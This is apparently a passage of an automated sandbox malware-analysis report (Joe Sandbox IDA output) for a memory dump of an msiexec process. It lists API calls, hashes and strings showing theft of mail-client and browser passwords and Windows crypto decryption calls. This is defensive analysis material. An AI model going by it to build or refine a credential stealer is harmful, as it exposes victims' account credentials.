                                                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 459 40cf3f-40cf43 452->459 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->459
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strlen$_strcmpimemset
                                                                                                            • String ID: /stext
                                                                                                            • API String ID: 520177685-3817206916
                                                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 145871493-0
                                                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                            APIs
                                                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4165544737-0
                                                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                            APIs
                                                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                            • API String ID: 2238633743-192783356
                                                                                                            • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                            • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                            • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                            • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                            • API String ID: 3963849919-1658304561
                                                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                                            • String ID: (yE$(yE$(yE
                                                                                                            • API String ID: 1865533344-362086290
                                                                                                            • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                            • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                            • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                            • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040EBD8
                                                                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                            • memset.MSVCRT ref: 0040EC2B
                                                                                                            • memset.MSVCRT ref: 0040EC47
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                            • memset.MSVCRT ref: 0040ECDD
                                                                                                            • memset.MSVCRT ref: 0040ECF2
                                                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                            • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                            • memset.MSVCRT ref: 0040EDE1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                            • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                            • API String ID: 3137614212-1455797042
                                                                                                            • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                            • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                            • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                            • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                            • memset.MSVCRT ref: 0040E5B8
                                                                                                            • memset.MSVCRT ref: 0040E5CD
                                                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                            • memset.MSVCRT ref: 0040E6B5
                                                                                                            • memset.MSVCRT ref: 0040E6CC
                                                                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                              • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                            • memset.MSVCRT ref: 0040E736
                                                                                                            • memset.MSVCRT ref: 0040E74F
                                                                                                            • sprintf.MSVCRT ref: 0040E76D
                                                                                                            • sprintf.MSVCRT ref: 0040E788
                                                                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                            • memset.MSVCRT ref: 0040E858
                                                                                                            • sprintf.MSVCRT ref: 0040E873
                                                                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                            • API String ID: 4171719235-3943159138
                                                                                                            • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                            • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                            • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                            • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                            • GetDC.USER32 ref: 004104E2
                                                                                                            • strlen.MSVCRT ref: 00410522
                                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                            • sprintf.MSVCRT ref: 00410640
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                                            • API String ID: 1703216249-3046471546
                                                                                                            • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                            • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                            • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                            • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004024F5
                                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                            • _mbscpy.MSVCRT(?,00000000,?,?,?,68147B60,?,00000000), ref: 00402533
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy$QueryValuememset
                                                                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                            • API String ID: 168965057-606283353
                                                                                                            • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                            • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00402869
                                                                                                              • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                            • _mbscpy.MSVCRT(?,?,68147B60,?,00000000), ref: 004028A3
                                                                                                              • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68147B60,?,00000000), ref: 0040297B
                                                                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                            • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                            • API String ID: 1497257669-167382505
                                                                                                            • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                            • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                            • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                            • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                            • memset.MSVCRT ref: 0040128E
                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
